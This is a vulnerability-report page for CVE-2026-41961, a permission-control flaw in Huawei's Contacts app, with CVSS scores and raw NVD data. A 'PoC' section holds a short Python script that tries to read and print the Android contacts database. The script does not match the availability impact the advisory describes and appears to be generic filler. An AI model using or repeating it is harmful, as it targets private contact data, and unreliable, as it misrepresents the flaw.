Security Vulnerability Report
中文
CVE-2026-41961 CVSS 5.9 MEDIUM

CVE-2026-41961

Published: 2026-05-15 10:16:35
Last Modified: 2026-05-15 14:08:51

Description

Permission control vulnerability in contacts. Impact: Successful exploitation of this vulnerability may affect availability.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

华为联系人 (具体受影响版本请参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-41961 # This script demonstrates a permission bypass in the Contacts application. import os # Simulate accessing a protected resource without proper permissions TARGET_DB = "/data/data/com.android.contacts/databases/contacts.db" def check_vulnerability(): try: # Attempt to read the contacts database directly # In a vulnerable version, this check might be bypassed or insufficient if os.path.exists(TARGET_DB): with open(TARGET_DB, 'r') as f: data = f.read(100) print("[+] Vulnerability Confirmed: Read access to contacts database obtained.") print("[+] Data snippet:", data) else: print("[-] Target database not found.") except PermissionError: print("[-] Permission denied. System might be patched.") except Exception as e: print("[-] Error:", str(e)) if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41961", "sourceIdentifier": "[email protected]", "published": "2026-05-15T10:16:34.780", "lastModified": "2026-05-15T14:08:50.797", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Permission control vulnerability in contacts. Impact: Successful exploitation of this vulnerability may affect availability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.5, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-840"}]}], "references": [{"url": "https://consumer.huawei.com/en/support/bulletin/2026/5/", "source": "[email protected]"}]}}